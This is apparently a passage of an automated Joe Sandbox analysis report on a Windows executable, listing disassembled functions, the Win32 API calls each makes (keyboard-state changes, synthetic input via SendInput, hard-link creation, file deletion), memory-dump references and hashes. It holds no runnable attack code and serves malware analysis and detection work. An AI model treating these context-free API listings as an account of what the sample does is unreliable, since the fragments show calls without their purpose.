                                                                                                                                                                                                                                                                                                    • Instruction ID: 5bd470b95cd32d7d7b4cb57a5ac0af6b345412c4a13009e75629a56730389fce
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef4e2a8a3824c94450eac92b58d4a9481853eba96015b1820ab52d66bc548b75
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FC412E71A40704AFD728AF78DC41B6ABBEDEF88711F10A92EF511FB291D771A9058780
                                                                                                                                                                                                                                                                                                    Function 00E9611E Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00E961C8
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 00E961EE
                                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00E96213
                                                                                                                                                                                                                                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00E9623F
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3321077145-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 4066f65dcaf5a90f793af44720f6bf0d9780ce909d822550f43e81cff9a89be5
                                                                                                                                                                                                                                                                                                    • Instruction ID: 571e2440ab78be3de0e4364b26c98f3dc72578ef7df737e3e05684f093564ee7
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4066f65dcaf5a90f793af44720f6bf0d9780ce909d822550f43e81cff9a89be5
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C413A35600620DFCF11EF15C985A5EBBE2EF89714B198499E84ABB362CB30FD01CB91
                                                                                                                                                                                                                                                                                                    Function 00E8B41E Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00E8B473
                                                                                                                                                                                                                                                                                                    • SetKeyboardState.USER32(00000080), ref: 00E8B48F
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00E8B4FD
                                                                                                                                                                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00E8B54F
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 432972143-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: f9bdd62559dd8705935ac1eac509dbe0aa792f9929e8945e5cb7504520cd03c4
                                                                                                                                                                                                                                                                                                    • Instruction ID: 3cf3900248c7480c91dd3c429627896524b437d71b663a66395ba5b266742e93
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f9bdd62559dd8705935ac1eac509dbe0aa792f9929e8945e5cb7504520cd03c4
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 32314B70A44608AEFF30EB658C067FA7BB6AB48314F08521AE4ADB61D2D37499458761
                                                                                                                                                                                                                                                                                                    Function 00E8B563 Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00E8B5B8
                                                                                                                                                                                                                                                                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00E8B5D4
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 00E8B63B
                                                                                                                                                                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00E8B68D
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 432972143-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 08b07db3ba74b61bde5809fa58f8863fff209f70ea5f19a4ea24a8e8ae8f9fb4
                                                                                                                                                                                                                                                                                                    • Instruction ID: 12a4eb85d343cd03e11ac9979f17e0fba290a668f8e4655f80b155de5fd403df
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 08b07db3ba74b61bde5809fa58f8863fff209f70ea5f19a4ea24a8e8ae8f9fb4
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64313E30D406089FFF30AB658C057FB7BA6EF85314F04522BE48D761D1E7748945AB91
                                                                                                                                                                                                                                                                                                    Function 00EB80AE Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 00EB80D4
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00EB814A
                                                                                                                                                                                                                                                                                                    • PtInRect.USER32(?,?,?), ref: 00EB815A
                                                                                                                                                                                                                                                                                                    • MessageBeep.USER32(00000000), ref: 00EB81C6
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1352109105-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: f1530c22ecc722712377476f75da266e20ec6f9a01ca342f2bb4d778c37cef26
                                                                                                                                                                                                                                                                                                    • Instruction ID: fa105cb638458531273bc88a5cbfaef734d43e882e16357032bb28fcca3b6a4e
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f1530c22ecc722712377476f75da266e20ec6f9a01ca342f2bb4d778c37cef26
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A417E30A03215DFCB15CF5DC984AEA77F9BB85314F1491A8EA54BB361CB70A846CF50
                                                                                                                                                                                                                                                                                                    Function 00EB2176 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetForegroundWindow.USER32 ref: 00EB2187
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E84393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E843AD
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E84393: GetCurrentThreadId.KERNEL32 ref: 00E843B4
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E84393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00E82F00), ref: 00E843BB
                                                                                                                                                                                                                                                                                                    • GetCaretPos.USER32(?), ref: 00EB219B
                                                                                                                                                                                                                                                                                                    • ClientToScreen.USER32(00000000,?), ref: 00EB21E8
                                                                                                                                                                                                                                                                                                    • GetForegroundWindow.USER32 ref: 00EB21EE
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2759813231-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: cf2855bae277e9a866d539bf536a5a30ed60522ca694817a457bdfbcd06d3377
                                                                                                                                                                                                                                                                                                    • Instruction ID: f587ccdc498565f22354fc69762be6cab46e07aba6443bf9271e0f8ab02594a9
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cf2855bae277e9a866d539bf536a5a30ed60522ca694817a457bdfbcd06d3377
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C13150B1D01119AFCB04EFA9C8818EFBBF8EF48304B50906AE515F7311DA319E45CBA0
                                                                                                                                                                                                                                                                                                    Function 00E8E8AC Relevance: 6.1, APIs: 4, Instructions: 87COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E241EA: _wcslen.LIBCMT ref: 00E241EF
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E8E8E2
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E8E8F9
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E8E924
                                                                                                                                                                                                                                                                                                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00E8E92F
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen$ExtentPoint32Text
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3763101759-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 9168062a5805ac72546878e27acd4a9640b775499cdc9a83f82edc3c89671f1c
                                                                                                                                                                                                                                                                                                    • Instruction ID: c44a7c7b5082c3027a9770dd6b07f9ffc38b55111ce1749deb30e55fbba7e786
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9168062a5805ac72546878e27acd4a9640b775499cdc9a83f82edc3c89671f1c
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0821B5B2D01214AFDB10BFA4D981BAEB7F8EF45750F1460A5E908BB381D6709E41C7A1
                                                                                                                                                                                                                                                                                                    Function 00E8DB6C Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,00EBDC30), ref: 00E8DBA6
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00E8DBB5
                                                                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00E8DBC4
                                                                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00EBDC30), ref: 00E8DC21
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2267087916-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 9a28d506d7b025ef6db375df488de301e1e3f5681beb277e0b1a195aa14eb62d
                                                                                                                                                                                                                                                                                                    • Instruction ID: d9b0bd38e6029c6f0d23d4cdbca408b4f0f76d265fd125f01cce663e9a31cbd8
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a28d506d7b025ef6db375df488de301e1e3f5681beb277e0b1a195aa14eb62d
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A217E3114C2059F8700EF24DD8089BBBE8EF56368F101A19F49DE32E1E730D94ACB82
                                                                                                                                                                                                                                                                                                    Function 00EB321E Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00EB32A6
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00EB32C0
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00EB32CE
                                                                                                                                                                                                                                                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00EB32DC
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$Long$AttributesLayered
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2169480361-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 39343c9f5de96c9415fcc29bbbb9a9bc6fe4b289d596850b90048794f042e4aa
                                                                                                                                                                                                                                                                                                    • Instruction ID: c1601cbf5322c0d3d71a8dd79d7bbdf3227cc56a2e45577e732ebee9def9d610
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 39343c9f5de96c9415fcc29bbbb9a9bc6fe4b289d596850b90048794f042e4aa
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FF21C431209121AFD7159B24CC46FEB7B95EF85318F248259F826AB2E2CB71ED41CBD0
                                                                                                                                                                                                                                                                                                    Function 00E8825C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E896E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00E88271,?,000000FF,?,00E890BB,00000000,?,0000001C,?,?), ref: 00E896F3
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E896E4: lstrcpyW.KERNEL32(00000000,?,?,00E88271,?,000000FF,?,00E890BB,00000000,?,0000001C,?,?,00000000), ref: 00E89719
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E896E4: lstrcmpiW.KERNEL32(00000000,?,00E88271,?,000000FF,?,00E890BB,00000000,?,0000001C,?,?), ref: 00E8974A
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00E890BB,00000000,?,0000001C,?,?,00000000), ref: 00E8828A
                                                                                                                                                                                                                                                                                                    • lstrcpyW.KERNEL32(00000000,?,?,00E890BB,00000000,?,0000001C,?,?,00000000), ref: 00E882B0
                                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,00E890BB,00000000,?,0000001C,?,?,00000000), ref: 00E882EB
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                                                                                                                                                    • String ID: cdecl
                                                                                                                                                                                                                                                                                                    • API String ID: 4031866154-3896280584
                                                                                                                                                                                                                                                                                                    • Opcode ID: ec3b2d830b918710bdd4b212a50bd06032442020c11992592395f72261f7298f
                                                                                                                                                                                                                                                                                                    • Instruction ID: 40fcbbc9be26ef71c9308187a8dea7b55610b8fd0775a0d193e38b9fe6e785b2
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec3b2d830b918710bdd4b212a50bd06032442020c11992592395f72261f7298f
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E011E13A200242ABCB15AF38D844E7A77E9FF45754B50512AFD4AD7260EF319801D790
                                                                                                                                                                                                                                                                                                    Function 00EB60FF Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001060,?,00000004), ref: 00EB615A
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EB616C
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EB6177
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00EB62B5
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend_wcslen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 455545452-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: ed218b545235adcd62da5495c32a0ad4ccae388788fbbb1ee2b52589040fa208
                                                                                                                                                                                                                                                                                                    • Instruction ID: 31df184da0265276fb32313395453b7c685bfafb73a171c511e199e441c72616
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed218b545235adcd62da5495c32a0ad4ccae388788fbbb1ee2b52589040fa208
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4411D376600218AADB10DFA5DCC4AFFB7BCEB55354F14612AFA15F6082EB78C944CB60
                                                                                                                                                                                                                                                                                                    Function 00E52079 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                    • Opcode ID: 9c1e5949b9ff7a3bda3c971a5c68c15206852eb5492bb30591e52813eb00d11c
                                                                                                                                                                                                                                                                                                    • Instruction ID: a2d9bfeede44b604afaa8bd834a2555ca8021b2fb4a2c2dad3ad69e627ba4fa3
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c1e5949b9ff7a3bda3c971a5c68c15206852eb5492bb30591e52813eb00d11c
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 150184B220A2167EE62126796CC0F67675DDF5237AF306B29BE21B11D1EA608C488160
